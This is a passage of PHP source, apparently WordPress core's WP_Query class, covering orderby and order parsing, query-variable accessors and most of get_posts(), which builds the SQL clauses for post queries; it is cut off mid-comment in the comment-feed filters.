{$wpdb->posts}.post_excerpt LIKE %s THEN 4 ", $like ); $search_orderby .= $wpdb->prepare( "WHEN {$wpdb->posts}.post_content LIKE %s THEN 5 ", $like ); } if ( $search_orderby ) { $search_orderby = '(CASE ' . $search_orderby . 'ELSE 6 END)'; } } else { // single word or sentence search $search_orderby = reset( $q['search_orderby_title'] ) . ' DESC'; } return $search_orderby; } /** * Converts the given orderby alias (if allowed) to a properly-prefixed value. * * @since 4.0.0 * * @global wpdb $wpdb WordPress database abstraction object. * * @param string $orderby Alias for the field to order by. * @return string|false Table-prefixed value to used in the ORDER clause. False otherwise. */ protected function parse_orderby( $orderby ) { global $wpdb; // Used to filter values. $allowed_keys = array( 'post_name', 'post_author', 'post_date', 'post_title', 'post_modified', 'post_parent', 'post_type', 'name', 'author', 'date', 'title', 'modified', 'parent', 'type', 'ID', 'menu_order', 'comment_count', 'rand', 'post__in', 'post_parent__in', 'post_name__in', ); $primary_meta_key = ''; $primary_meta_query = false; $meta_clauses = $this->meta_query->get_clauses(); if ( ! empty( $meta_clauses ) ) { $primary_meta_query = reset( $meta_clauses ); if ( ! empty( $primary_meta_query['key'] ) ) { $primary_meta_key = $primary_meta_query['key']; $allowed_keys[] = $primary_meta_key; } $allowed_keys[] = 'meta_value'; $allowed_keys[] = 'meta_value_num'; $allowed_keys = array_merge( $allowed_keys, array_keys( $meta_clauses ) ); } // If RAND() contains a seed value, sanitize and add to allowed keys. $rand_with_seed = false; if ( preg_match( '/RAND\(([0-9]+)\)/i', $orderby, $matches ) ) { $orderby = sprintf( 'RAND(%s)', intval( $matches[1] ) ); $allowed_keys[] = $orderby; $rand_with_seed = true; } if ( ! in_array( $orderby, $allowed_keys, true ) ) { return false; } $orderby_clause = ''; switch ( $orderby ) { case 'post_name': case 'post_author': case 'post_date': case 'post_title': case 'post_modified': case 'post_parent': case 'post_type': case 'ID': case 'menu_order': case 'comment_count': $orderby_clause = "{$wpdb->posts}.{$orderby}"; break; case 'rand': $orderby_clause = 'RAND()'; break; case $primary_meta_key: case 'meta_value': if ( ! empty( $primary_meta_query['type'] ) ) { $orderby_clause = "CAST({$primary_meta_query['alias']}.meta_value AS {$primary_meta_query['cast']})"; } else { $orderby_clause = "{$primary_meta_query['alias']}.meta_value"; } break; case 'meta_value_num': $orderby_clause = "{$primary_meta_query['alias']}.meta_value+0"; break; case 'post__in': if ( ! empty( $this->query_vars['post__in'] ) ) { $orderby_clause = "FIELD({$wpdb->posts}.ID," . implode( ',', array_map( 'absint', $this->query_vars['post__in'] ) ) . ')'; } break; case 'post_parent__in': if ( ! empty( $this->query_vars['post_parent__in'] ) ) { $orderby_clause = "FIELD( {$wpdb->posts}.post_parent," . implode( ', ', array_map( 'absint', $this->query_vars['post_parent__in'] ) ) . ' )'; } break; case 'post_name__in': if ( ! empty( $this->query_vars['post_name__in'] ) ) { $post_name__in = array_map( 'sanitize_title_for_query', $this->query_vars['post_name__in'] ); $post_name__in_string = "'" . implode( "','", $post_name__in ) . "'"; $orderby_clause = "FIELD( {$wpdb->posts}.post_name," . $post_name__in_string . ' )'; } break; default: if ( array_key_exists( $orderby, $meta_clauses ) ) { // $orderby corresponds to a meta_query clause. $meta_clause = $meta_clauses[ $orderby ]; $orderby_clause = "CAST({$meta_clause['alias']}.meta_value AS {$meta_clause['cast']})"; } elseif ( $rand_with_seed ) { $orderby_clause = $orderby; } else { // Default: order by post field. $orderby_clause = "{$wpdb->posts}.post_" . sanitize_key( $orderby ); } break; } return $orderby_clause; } /** * Parse an 'order' query variable and cast it to ASC or DESC as necessary. * * @since 4.0.0 * * @param string $order The 'order' query variable. * @return string The sanitized 'order' query variable. */ protected function parse_order( $order ) { if ( ! is_string( $order ) || empty( $order ) ) { return 'DESC'; } if ( 'ASC' === strtoupper( $order ) ) { return 'ASC'; } else { return 'DESC'; } } /** * Sets the 404 property and saves whether query is feed. * * @since 2.0.0 */ public function set_404() { $is_feed = $this->is_feed; $this->init_query_flags(); $this->is_404 = true; $this->is_feed = $is_feed; } /** * Retrieve query variable. * * @since 1.5.0 * @since 3.9.0 The `$default` argument was introduced. * * @param string $query_var Query variable key. * @param mixed $default Optional. Value to return if the query variable is not set. Default empty. * @return mixed Contents of the query variable. */ public function get( $query_var, $default = '' ) { if ( isset( $this->query_vars[ $query_var ] ) ) { return $this->query_vars[ $query_var ]; } return $default; } /** * Set query variable. * * @since 1.5.0 * * @param string $query_var Query variable key. * @param mixed $value Query variable value. */ public function set( $query_var, $value ) { $this->query_vars[ $query_var ] = $value; } /** * Retrieves an array of posts based on query variables. * * There are a few filters and actions that can be used to modify the post * database query. * * @since 1.5.0 * * @return WP_Post[]|int[] Array of post objects or post IDs. */ public function get_posts() { global $wpdb; $this->parse_query(); /** * Fires after the query variable object is created, but before the actual query is run. * * Note: If using conditional tags, use the method versions within the passed instance * (e.g. $this->is_main_query() instead of is_main_query()). This is because the functions * like is_main_query() test against the global $wp_query instance, not the passed one. * * @since 2.0.0 * * @param WP_Query $this The WP_Query instance (passed by reference). */ do_action_ref_array( 'pre_get_posts', array( &$this ) ); // Shorthand. $q = &$this->query_vars; // Fill again in case pre_get_posts unset some vars. $q = $this->fill_query_vars( $q ); /** * Filters whether an attachment query should include filenames or not. * * @since 6.0.3 * * @param bool $allow_query_attachment_by_filename Whether or not to include filenames. */ $this->allow_query_attachment_by_filename = apply_filters( 'wp_allow_query_attachment_by_filename', false ); remove_all_filters( 'wp_allow_query_attachment_by_filename' ); // Parse meta query $this->meta_query = new WP_Meta_Query(); $this->meta_query->parse_query_vars( $q ); // Set a flag if a pre_get_posts hook changed the query vars. $hash = md5( serialize( $this->query_vars ) ); if ( $hash != $this->query_vars_hash ) { $this->query_vars_changed = true; $this->query_vars_hash = $hash; } unset( $hash ); // First let's clear some variables $distinct = ''; $whichauthor = ''; $whichmimetype = ''; $where = ''; $limits = ''; $join = ''; $search = ''; $groupby = ''; $post_status_join = false; $page = 1; if ( isset( $q['caller_get_posts'] ) ) { _deprecated_argument( 'WP_Query', '3.1.0', /* translators: 1: caller_get_posts, 2: ignore_sticky_posts */ sprintf( __( '%1$s is deprecated. Use %2$s instead.' ), 'caller_get_posts', 'ignore_sticky_posts' ) ); if ( ! isset( $q['ignore_sticky_posts'] ) ) { $q['ignore_sticky_posts'] = $q['caller_get_posts']; } } if ( ! isset( $q['ignore_sticky_posts'] ) ) { $q['ignore_sticky_posts'] = false; } if ( ! isset( $q['suppress_filters'] ) ) { $q['suppress_filters'] = false; } if ( ! isset( $q['cache_results'] ) ) { if ( wp_using_ext_object_cache() ) { $q['cache_results'] = false; } else { $q['cache_results'] = true; } } if ( ! isset( $q['update_post_term_cache'] ) ) { $q['update_post_term_cache'] = true; } if ( ! isset( $q['lazy_load_term_meta'] ) ) { $q['lazy_load_term_meta'] = $q['update_post_term_cache']; } if ( ! isset( $q['update_post_meta_cache'] ) ) { $q['update_post_meta_cache'] = true; } if ( ! isset( $q['post_type'] ) ) { if ( $this->is_search ) { $q['post_type'] = 'any'; } else { $q['post_type'] = ''; } } $post_type = $q['post_type']; if ( empty( $q['posts_per_page'] ) ) { $q['posts_per_page'] = get_option( 'posts_per_page' ); } if ( isset( $q['showposts'] ) && $q['showposts'] ) { $q['showposts'] = (int) $q['showposts']; $q['posts_per_page'] = $q['showposts']; } if ( ( isset( $q['posts_per_archive_page'] ) && $q['posts_per_archive_page'] != 0 ) && ( $this->is_archive || $this->is_search ) ) { $q['posts_per_page'] = $q['posts_per_archive_page']; } if ( ! isset( $q['nopaging'] ) ) { if ( $q['posts_per_page'] == -1 ) { $q['nopaging'] = true; } else { $q['nopaging'] = false; } } if ( $this->is_feed ) { // This overrides posts_per_page. if ( ! empty( $q['posts_per_rss'] ) ) { $q['posts_per_page'] = $q['posts_per_rss']; } else { $q['posts_per_page'] = get_option( 'posts_per_rss' ); } $q['nopaging'] = false; } $q['posts_per_page'] = (int) $q['posts_per_page']; if ( $q['posts_per_page'] < -1 ) { $q['posts_per_page'] = abs( $q['posts_per_page'] ); } elseif ( $q['posts_per_page'] == 0 ) { $q['posts_per_page'] = 1; } if ( ! isset( $q['comments_per_page'] ) || $q['comments_per_page'] == 0 ) { $q['comments_per_page'] = get_option( 'comments_per_page' ); } if ( $this->is_home && ( empty( $this->query ) || $q['preview'] == 'true' ) && ( 'page' == get_option( 'show_on_front' ) ) && get_option( 'page_on_front' ) ) { $this->is_page = true; $this->is_home = false; $q['page_id'] = get_option( 'page_on_front' ); } if ( isset( $q['page'] ) ) { $q['page'] = trim( $q['page'], '/' ); $q['page'] = absint( $q['page'] ); } // If true, forcibly turns off SQL_CALC_FOUND_ROWS even when limits are present. if ( isset( $q['no_found_rows'] ) ) { $q['no_found_rows'] = (bool) $q['no_found_rows']; } else { $q['no_found_rows'] = false; } switch ( $q['fields'] ) { case 'ids': $fields = "{$wpdb->posts}.ID"; break; case 'id=>parent': $fields = "{$wpdb->posts}.ID, {$wpdb->posts}.post_parent"; break; default: $fields = "{$wpdb->posts}.*"; } if ( '' !== $q['menu_order'] ) { $where .= " AND {$wpdb->posts}.menu_order = " . $q['menu_order']; } // The "m" parameter is meant for months but accepts datetimes of varying specificity if ( $q['m'] ) { $where .= " AND YEAR({$wpdb->posts}.post_date)=" . substr( $q['m'], 0, 4 ); if ( strlen( $q['m'] ) > 5 ) { $where .= " AND MONTH({$wpdb->posts}.post_date)=" . substr( $q['m'], 4, 2 ); } if ( strlen( $q['m'] ) > 7 ) { $where .= " AND DAYOFMONTH({$wpdb->posts}.post_date)=" . substr( $q['m'], 6, 2 ); } if ( strlen( $q['m'] ) > 9 ) { $where .= " AND HOUR({$wpdb->posts}.post_date)=" . substr( $q['m'], 8, 2 ); } if ( strlen( $q['m'] ) > 11 ) { $where .= " AND MINUTE({$wpdb->posts}.post_date)=" . substr( $q['m'], 10, 2 ); } if ( strlen( $q['m'] ) > 13 ) { $where .= " AND SECOND({$wpdb->posts}.post_date)=" . substr( $q['m'], 12, 2 ); } } // Handle the other individual date parameters $date_parameters = array(); if ( '' !== $q['hour'] ) { $date_parameters['hour'] = $q['hour']; } if ( '' !== $q['minute'] ) { $date_parameters['minute'] = $q['minute']; } if ( '' !== $q['second'] ) { $date_parameters['second'] = $q['second']; } if ( $q['year'] ) { $date_parameters['year'] = $q['year']; } if ( $q['monthnum'] ) { $date_parameters['monthnum'] = $q['monthnum']; } if ( $q['w'] ) { $date_parameters['week'] = $q['w']; } if ( $q['day'] ) { $date_parameters['day'] = $q['day']; } if ( $date_parameters ) { $date_query = new WP_Date_Query( array( $date_parameters ) ); $where .= $date_query->get_sql(); } unset( $date_parameters, $date_query ); // Handle complex date queries if ( ! empty( $q['date_query'] ) ) { $this->date_query = new WP_Date_Query( $q['date_query'] ); $where .= $this->date_query->get_sql(); } // If we've got a post_type AND it's not "any" post_type. if ( ! empty( $q['post_type'] ) && 'any' != $q['post_type'] ) { foreach ( (array) $q['post_type'] as $_post_type ) { $ptype_obj = get_post_type_object( $_post_type ); if ( ! $ptype_obj || ! $ptype_obj->query_var || empty( $q[ $ptype_obj->query_var ] ) ) { continue; } if ( ! $ptype_obj->hierarchical ) { // Non-hierarchical post types can directly use 'name'. $q['name'] = $q[ $ptype_obj->query_var ]; } else { // Hierarchical post types will operate through 'pagename'. $q['pagename'] = $q[ $ptype_obj->query_var ]; $q['name'] = ''; } // Only one request for a slug is possible, this is why name & pagename are overwritten above. break; } //end foreach unset( $ptype_obj ); } if ( '' !== $q['title'] ) { $where .= $wpdb->prepare( " AND {$wpdb->posts}.post_title = %s", stripslashes( $q['title'] ) ); } // Parameters related to 'post_name'. if ( '' != $q['name'] ) { $q['name'] = sanitize_title_for_query( $q['name'] ); $where .= " AND {$wpdb->posts}.post_name = '" . $q['name'] . "'"; } elseif ( '' != $q['pagename'] ) { if ( isset( $this->queried_object_id ) ) { $reqpage = $this->queried_object_id; } else { if ( 'page' != $q['post_type'] ) { foreach ( (array) $q['post_type'] as $_post_type ) { $ptype_obj = get_post_type_object( $_post_type ); if ( ! $ptype_obj || ! $ptype_obj->hierarchical ) { continue; } $reqpage = get_page_by_path( $q['pagename'], OBJECT, $_post_type ); if ( $reqpage ) { break; } } unset( $ptype_obj ); } else { $reqpage = get_page_by_path( $q['pagename'] ); } if ( ! empty( $reqpage ) ) { $reqpage = $reqpage->ID; } else { $reqpage = 0; } } $page_for_posts = get_option( 'page_for_posts' ); if ( ( 'page' != get_option( 'show_on_front' ) ) || empty( $page_for_posts ) || ( $reqpage != $page_for_posts ) ) { $q['pagename'] = sanitize_title_for_query( wp_basename( $q['pagename'] ) ); $q['name'] = $q['pagename']; $where .= " AND ({$wpdb->posts}.ID = '$reqpage')"; $reqpage_obj = get_post( $reqpage ); if ( is_object( $reqpage_obj ) && 'attachment' == $reqpage_obj->post_type ) { $this->is_attachment = true; $post_type = $q['post_type'] = 'attachment'; $this->is_page = true; $q['attachment_id'] = $reqpage; } } } elseif ( '' != $q['attachment'] ) { $q['attachment'] = sanitize_title_for_query( wp_basename( $q['attachment'] ) ); $q['name'] = $q['attachment']; $where .= " AND {$wpdb->posts}.post_name = '" . $q['attachment'] . "'"; } elseif ( is_array( $q['post_name__in'] ) && ! empty( $q['post_name__in'] ) ) { $q['post_name__in'] = array_map( 'sanitize_title_for_query', $q['post_name__in'] ); $post_name__in = "'" . implode( "','", $q['post_name__in'] ) . "'"; $where .= " AND {$wpdb->posts}.post_name IN ($post_name__in)"; } // If an attachment is requested by number, let it supersede any post number. if ( $q['attachment_id'] ) { $q['p'] = absint( $q['attachment_id'] ); } // If a post number is specified, load that post if ( $q['p'] ) { $where .= " AND {$wpdb->posts}.ID = " . $q['p']; } elseif ( $q['post__in'] ) { $post__in = implode( ',', array_map( 'absint', $q['post__in'] ) ); $where .= " AND {$wpdb->posts}.ID IN ($post__in)"; } elseif ( $q['post__not_in'] ) { $post__not_in = implode( ',', array_map( 'absint', $q['post__not_in'] ) ); $where .= " AND {$wpdb->posts}.ID NOT IN ($post__not_in)"; } if ( is_numeric( $q['post_parent'] ) ) { $where .= $wpdb->prepare( " AND {$wpdb->posts}.post_parent = %d ", $q['post_parent'] ); } elseif ( $q['post_parent__in'] ) { $post_parent__in = implode( ',', array_map( 'absint', $q['post_parent__in'] ) ); $where .= " AND {$wpdb->posts}.post_parent IN ($post_parent__in)"; } elseif ( $q['post_parent__not_in'] ) { $post_parent__not_in = implode( ',', array_map( 'absint', $q['post_parent__not_in'] ) ); $where .= " AND {$wpdb->posts}.post_parent NOT IN ($post_parent__not_in)"; } if ( $q['page_id'] ) { if ( ( 'page' != get_option( 'show_on_front' ) ) || ( $q['page_id'] != get_option( 'page_for_posts' ) ) ) { $q['p'] = $q['page_id']; $where = " AND {$wpdb->posts}.ID = " . $q['page_id']; } } // If a search pattern is specified, load the posts that match. if ( strlen( $q['s'] ) ) { $search = $this->parse_search( $q ); } if ( ! $q['suppress_filters'] ) { /** * Filters the search SQL that is used in the WHERE clause of WP_Query. * * @since 3.0.0 * * @param string $search Search SQL for WHERE clause. * @param WP_Query $this The current WP_Query object. */ $search = apply_filters_ref_array( 'posts_search', array( $search, &$this ) ); } // Taxonomies if ( ! $this->is_singular ) { $this->parse_tax_query( $q ); $clauses = $this->tax_query->get_sql( $wpdb->posts, 'ID' ); $join .= $clauses['join']; $where .= $clauses['where']; } if ( $this->is_tax ) { if ( empty( $post_type ) ) { // Do a fully inclusive search for currently registered post types of queried taxonomies $post_type = array(); $taxonomies = array_keys( $this->tax_query->queried_terms ); foreach ( get_post_types( array( 'exclude_from_search' => false ) ) as $pt ) { $object_taxonomies = $pt === 'attachment' ? get_taxonomies_for_attachments() : get_object_taxonomies( $pt ); if ( array_intersect( $taxonomies, $object_taxonomies ) ) { $post_type[] = $pt; } } if ( ! $post_type ) { $post_type = 'any'; } elseif ( count( $post_type ) == 1 ) { $post_type = $post_type[0]; } $post_status_join = true; } elseif ( in_array( 'attachment', (array) $post_type ) ) { $post_status_join = true; } } /* * Ensure that 'taxonomy', 'term', 'term_id', 'cat', and * 'category_name' vars are set for backward compatibility. */ if ( ! empty( $this->tax_query->queried_terms ) ) { /* * Set 'taxonomy', 'term', and 'term_id' to the * first taxonomy other than 'post_tag' or 'category'. */ if ( ! isset( $q['taxonomy'] ) ) { foreach ( $this->tax_query->queried_terms as $queried_taxonomy => $queried_items ) { if ( empty( $queried_items['terms'][0] ) ) { continue; } if ( ! in_array( $queried_taxonomy, array( 'category', 'post_tag' ) ) ) { $q['taxonomy'] = $queried_taxonomy; if ( 'slug' === $queried_items['field'] ) { $q['term'] = $queried_items['terms'][0]; } else { $q['term_id'] = $queried_items['terms'][0]; } // Take the first one we find. break; } } } // 'cat', 'category_name', 'tag_id' foreach ( $this->tax_query->queried_terms as $queried_taxonomy => $queried_items ) { if ( empty( $queried_items['terms'][0] ) ) { continue; } if ( 'category' === $queried_taxonomy ) { $the_cat = get_term_by( $queried_items['field'], $queried_items['terms'][0], 'category' ); if ( $the_cat ) { $this->set( 'cat', $the_cat->term_id ); $this->set( 'category_name', $the_cat->slug ); } unset( $the_cat ); } if ( 'post_tag' === $queried_taxonomy ) { $the_tag = get_term_by( $queried_items['field'], $queried_items['terms'][0], 'post_tag' ); if ( $the_tag ) { $this->set( 'tag_id', $the_tag->term_id ); } unset( $the_tag ); } } } if ( ! empty( $this->tax_query->queries ) || ! empty( $this->meta_query->queries ) || ! empty( $this->allow_query_attachment_by_filename ) ) { $groupby = "{$wpdb->posts}.ID"; } // Author/user stuff if ( ! empty( $q['author'] ) && $q['author'] != '0' ) { $q['author'] = addslashes_gpc( '' . urldecode( $q['author'] ) ); $authors = array_unique( array_map( 'intval', preg_split( '/[,\s]+/', $q['author'] ) ) ); foreach ( $authors as $author ) { $key = $author > 0 ? 'author__in' : 'author__not_in'; $q[ $key ][] = abs( $author ); } $q['author'] = implode( ',', $authors ); } if ( ! empty( $q['author__not_in'] ) ) { $author__not_in = implode( ',', array_map( 'absint', array_unique( (array) $q['author__not_in'] ) ) ); $where .= " AND {$wpdb->posts}.post_author NOT IN ($author__not_in) "; } elseif ( ! empty( $q['author__in'] ) ) { $author__in = implode( ',', array_map( 'absint', array_unique( (array) $q['author__in'] ) ) ); $where .= " AND {$wpdb->posts}.post_author IN ($author__in) "; } // Author stuff for nice URLs if ( '' != $q['author_name'] ) { if ( strpos( $q['author_name'], '/' ) !== false ) { $q['author_name'] = explode( '/', $q['author_name'] ); if ( $q['author_name'][ count( $q['author_name'] ) - 1 ] ) { $q['author_name'] = $q['author_name'][ count( $q['author_name'] ) - 1 ]; // no trailing slash } else { $q['author_name'] = $q['author_name'][ count( $q['author_name'] ) - 2 ]; // there was a trailing slash } } $q['author_name'] = sanitize_title_for_query( $q['author_name'] ); $q['author'] = get_user_by( 'slug', $q['author_name'] ); if ( $q['author'] ) { $q['author'] = $q['author']->ID; } $whichauthor .= " AND ({$wpdb->posts}.post_author = " . absint( $q['author'] ) . ')'; } // Matching by comment count. if ( isset( $q['comment_count'] ) ) { // Numeric comment count is converted to array format. if ( is_numeric( $q['comment_count'] ) ) { $q['comment_count'] = array( 'value' => intval( $q['comment_count'] ), ); } if ( isset( $q['comment_count']['value'] ) ) { $q['comment_count'] = array_merge( array( 'compare' => '=', ), $q['comment_count'] ); // Fallback for invalid compare operators is '='. $compare_operators = array( '=', '!=', '>', '>=', '<', '<=' ); if ( ! in_array( $q['comment_count']['compare'], $compare_operators, true ) ) { $q['comment_count']['compare'] = '='; } $where .= $wpdb->prepare( " AND {$wpdb->posts}.comment_count {$q['comment_count']['compare']} %d", $q['comment_count']['value'] ); } } // MIME-Type stuff for attachment browsing if ( isset( $q['post_mime_type'] ) && '' != $q['post_mime_type'] ) { $whichmimetype = wp_post_mime_type_where( $q['post_mime_type'], $wpdb->posts ); } $where .= $search . $whichauthor . $whichmimetype; if ( ! empty( $this->allow_query_attachment_by_filename ) ) { $join .= " LEFT JOIN {$wpdb->postmeta} AS sq1 ON ( {$wpdb->posts}.ID = sq1.post_id AND sq1.meta_key = '_wp_attached_file' )"; } if ( ! empty( $this->meta_query->queries ) ) { $clauses = $this->meta_query->get_sql( 'post', $wpdb->posts, 'ID', $this ); $join .= $clauses['join']; $where .= $clauses['where']; } $rand = ( isset( $q['orderby'] ) && 'rand' === $q['orderby'] ); if ( ! isset( $q['order'] ) ) { $q['order'] = $rand ? '' : 'DESC'; } else { $q['order'] = $rand ? '' : $this->parse_order( $q['order'] ); } // These values of orderby should ignore the 'order' parameter. $force_asc = array( 'post__in', 'post_name__in', 'post_parent__in' ); if ( isset( $q['orderby'] ) && in_array( $q['orderby'], $force_asc, true ) ) { $q['order'] = ''; } // Order by. if ( empty( $q['orderby'] ) ) { /* * Boolean false or empty array blanks out ORDER BY, * while leaving the value unset or otherwise empty sets the default. */ if ( isset( $q['orderby'] ) && ( is_array( $q['orderby'] ) || false === $q['orderby'] ) ) { $orderby = ''; } else { $orderby = "{$wpdb->posts}.post_date " . $q['order']; } } elseif ( 'none' == $q['orderby'] ) { $orderby = ''; } else { $orderby_array = array(); if ( is_array( $q['orderby'] ) ) { foreach ( $q['orderby'] as $_orderby => $order ) { $orderby = addslashes_gpc( urldecode( $_orderby ) ); $parsed = $this->parse_orderby( $orderby ); if ( ! $parsed ) { continue; } $orderby_array[] = $parsed . ' ' . $this->parse_order( $order ); } $orderby = implode( ', ', $orderby_array ); } else { $q['orderby'] = urldecode( $q['orderby'] ); $q['orderby'] = addslashes_gpc( $q['orderby'] ); foreach ( explode( ' ', $q['orderby'] ) as $i => $orderby ) { $parsed = $this->parse_orderby( $orderby ); // Only allow certain values for safety. if ( ! $parsed ) { continue; } $orderby_array[] = $parsed; } $orderby = implode( ' ' . $q['order'] . ', ', $orderby_array ); if ( empty( $orderby ) ) { $orderby = "{$wpdb->posts}.post_date " . $q['order']; } elseif ( ! empty( $q['order'] ) ) { $orderby .= " {$q['order']}"; } } } // Order search results by relevance only when another "orderby" is not specified in the query. if ( ! empty( $q['s'] ) ) { $search_orderby = ''; if ( ! empty( $q['search_orderby_title'] ) && ( empty( $q['orderby'] ) && ! $this->is_feed ) || ( isset( $q['orderby'] ) && 'relevance' === $q['orderby'] ) ) { $search_orderby = $this->parse_search_order( $q ); } if ( ! $q['suppress_filters'] ) { /** * Filters the ORDER BY used when ordering search results. * * @since 3.7.0 * * @param string $search_orderby The ORDER BY clause. * @param WP_Query $this The current WP_Query instance. */ $search_orderby = apply_filters( 'posts_search_orderby', $search_orderby, $this ); } if ( $search_orderby ) { $orderby = $orderby ? $search_orderby . ', ' . $orderby : $search_orderby; } } if ( is_array( $post_type ) && count( $post_type ) > 1 ) { $post_type_cap = 'multiple_post_type'; } else { if ( is_array( $post_type ) ) { $post_type = reset( $post_type ); } $post_type_object = get_post_type_object( $post_type ); if ( empty( $post_type_object ) ) { $post_type_cap = $post_type; } } if ( isset( $q['post_password'] ) ) { $where .= $wpdb->prepare( " AND {$wpdb->posts}.post_password = %s", $q['post_password'] ); if ( empty( $q['perm'] ) ) { $q['perm'] = 'readable'; } } elseif ( isset( $q['has_password'] ) ) { $where .= sprintf( " AND {$wpdb->posts}.post_password %s ''", $q['has_password'] ? '!=' : '=' ); } if ( ! empty( $q['comment_status'] ) ) { $where .= $wpdb->prepare( " AND {$wpdb->posts}.comment_status = %s ", $q['comment_status'] ); } if ( ! empty( $q['ping_status'] ) ) { $where .= $wpdb->prepare( " AND {$wpdb->posts}.ping_status = %s ", $q['ping_status'] ); } if ( 'any' == $post_type ) { $in_search_post_types = get_post_types( array( 'exclude_from_search' => false ) ); if ( empty( $in_search_post_types ) ) { $where .= ' AND 1=0 '; } else { $where .= " AND {$wpdb->posts}.post_type IN ('" . join( "', '", array_map( 'esc_sql', $in_search_post_types ) ) . "')"; } } elseif ( ! empty( $post_type ) && is_array( $post_type ) ) { $where .= " AND {$wpdb->posts}.post_type IN ('" . join( "', '", esc_sql( $post_type ) ) . "')"; } elseif ( ! empty( $post_type ) ) { $where .= $wpdb->prepare( " AND {$wpdb->posts}.post_type = %s", $post_type ); $post_type_object = get_post_type_object( $post_type ); } elseif ( $this->is_attachment ) { $where .= " AND {$wpdb->posts}.post_type = 'attachment'"; $post_type_object = get_post_type_object( 'attachment' ); } elseif ( $this->is_page ) { $where .= " AND {$wpdb->posts}.post_type = 'page'"; $post_type_object = get_post_type_object( 'page' ); } else { $where .= " AND {$wpdb->posts}.post_type = 'post'"; $post_type_object = get_post_type_object( 'post' ); } $edit_cap = 'edit_post'; $read_cap = 'read_post'; if ( ! empty( $post_type_object ) ) { $edit_others_cap = $post_type_object->cap->edit_others_posts; $read_private_cap = $post_type_object->cap->read_private_posts; } else { $edit_others_cap = 'edit_others_' . $post_type_cap . 's'; $read_private_cap = 'read_private_' . $post_type_cap . 's'; } $user_id = get_current_user_id(); $q_status = array(); if ( ! empty( $q['post_status'] ) ) { $statuswheres = array(); $q_status = $q['post_status']; if ( ! is_array( $q_status ) ) { $q_status = explode( ',', $q_status ); } $r_status = array(); $p_status = array(); $e_status = array(); if ( in_array( 'any', $q_status ) ) { foreach ( get_post_stati( array( 'exclude_from_search' => true ) ) as $status ) { if ( ! in_array( $status, $q_status ) ) { $e_status[] = "{$wpdb->posts}.post_status <> '$status'"; } } } else { foreach ( get_post_stati() as $status ) { if ( in_array( $status, $q_status ) ) { if ( 'private' == $status ) { $p_status[] = "{$wpdb->posts}.post_status = '$status'"; } else { $r_status[] = "{$wpdb->posts}.post_status = '$status'"; } } } } if ( empty( $q['perm'] ) || 'readable' != $q['perm'] ) { $r_status = array_merge( $r_status, $p_status ); unset( $p_status ); } if ( ! empty( $e_status ) ) { $statuswheres[] = '(' . join( ' AND ', $e_status ) . ')'; } if ( ! empty( $r_status ) ) { if ( ! empty( $q['perm'] ) && 'editable' == $q['perm'] && ! current_user_can( $edit_others_cap ) ) { $statuswheres[] = "({$wpdb->posts}.post_author = $user_id " . 'AND (' . join( ' OR ', $r_status ) . '))'; } else { $statuswheres[] = '(' . join( ' OR ', $r_status ) . ')'; } } if ( ! empty( $p_status ) ) { if ( ! empty( $q['perm'] ) && 'readable' == $q['perm'] && ! current_user_can( $read_private_cap ) ) { $statuswheres[] = "({$wpdb->posts}.post_author = $user_id " . 'AND (' . join( ' OR ', $p_status ) . '))'; } else { $statuswheres[] = '(' . join( ' OR ', $p_status ) . ')'; } } if ( $post_status_join ) { $join .= " LEFT JOIN {$wpdb->posts} AS p2 ON ({$wpdb->posts}.post_parent = p2.ID) "; foreach ( $statuswheres as $index => $statuswhere ) { $statuswheres[ $index ] = "($statuswhere OR ({$wpdb->posts}.post_status = 'inherit' AND " . str_replace( $wpdb->posts, 'p2', $statuswhere ) . '))'; } } $where_status = implode( ' OR ', $statuswheres ); if ( ! empty( $where_status ) ) { $where .= " AND ($where_status)"; } } elseif ( ! $this->is_singular ) { $where .= " AND ({$wpdb->posts}.post_status = 'publish'"; // Add public states. $public_states = get_post_stati( array( 'public' => true ) ); foreach ( (array) $public_states as $state ) { if ( 'publish' == $state ) { // Publish is hard-coded above. continue; } $where .= " OR {$wpdb->posts}.post_status = '$state'"; } if ( $this->is_admin ) { // Add protected states that should show in the admin all list. $admin_all_states = get_post_stati( array( 'protected' => true, 'show_in_admin_all_list' => true, ) ); foreach ( (array) $admin_all_states as $state ) { $where .= " OR {$wpdb->posts}.post_status = '$state'"; } } if ( is_user_logged_in() ) { // Add private states that are limited to viewing by the author of a post or someone who has caps to read private states. $private_states = get_post_stati( array( 'private' => true ) ); foreach ( (array) $private_states as $state ) { $where .= current_user_can( $read_private_cap ) ? " OR {$wpdb->posts}.post_status = '$state'" : " OR {$wpdb->posts}.post_author = $user_id AND {$wpdb->posts}.post_status = '$state'"; } } $where .= ')'; } /* * Apply filters on where and join prior to paging so that any * manipulations to them are reflected in the paging by day queries. */ if ( ! $q['suppress_filters'] ) { /** * Filters the WHERE clause of the query. * * @since 1.5.0 * * @param string $where The WHERE clause of the query. * @param WP_Query $this The WP_Query instance (passed by reference). */ $where = apply_filters_ref_array( 'posts_where', array( $where, &$this ) ); /** * Filters the JOIN clause of the query. * * @since 1.5.0 * * @param string $join The JOIN clause of the query. * @param WP_Query $this The WP_Query instance (passed by reference). */ $join = apply_filters_ref_array( 'posts_join', array( $join, &$this ) ); } // Paging if ( empty( $q['nopaging'] ) && ! $this->is_singular ) { $page = absint( $q['paged'] ); if ( ! $page ) { $page = 1; } // If 'offset' is provided, it takes precedence over 'paged'. if ( isset( $q['offset'] ) && is_numeric( $q['offset'] ) ) { $q['offset'] = absint( $q['offset'] ); $pgstrt = $q['offset'] . ', '; } else { $pgstrt = absint( ( $page - 1 ) * $q['posts_per_page'] ) . ', '; } $limits = 'LIMIT ' . $pgstrt . $q['posts_per_page']; } // Comments feeds if ( $this->is_comment_feed && ! $this->is_singular ) { if ( $this->is_archive || $this->is_search ) { $cjoin = "JOIN {$wpdb->posts} ON ({$wpdb->comments}.comment_post_ID = {$wpdb->posts}.ID) $join "; $cwhere = "WHERE comment_approved = '1' $where"; $cgroupby = "{$wpdb->comments}.comment_id"; } else { // Other non singular e.g. front $cjoin = "JOIN {$wpdb->posts} ON ( {$wpdb->comments}.comment_post_ID = {$wpdb->posts}.ID )"; $cwhere = "WHERE ( post_status = 'publish' OR ( post_status = 'inherit' AND post_type = 'attachment' ) ) AND comment_approved = '1'"; $cgroupby = ''; } if ( ! $q['suppress_filters'] ) { /** * Filters the JOIN clause of the comments feed query before sending. * * @since 2.2.0 * * @param string $cjoin The JOIN clause of the query. * @param WP_Query $this The WP_Query instance (passed by reference). */ $cjoin = apply_filters_ref_array( 'comment_feed_join', array( $cjoin, &$this ) ); /** * Filters the WHERE clause of the comments feed query before sending. * * 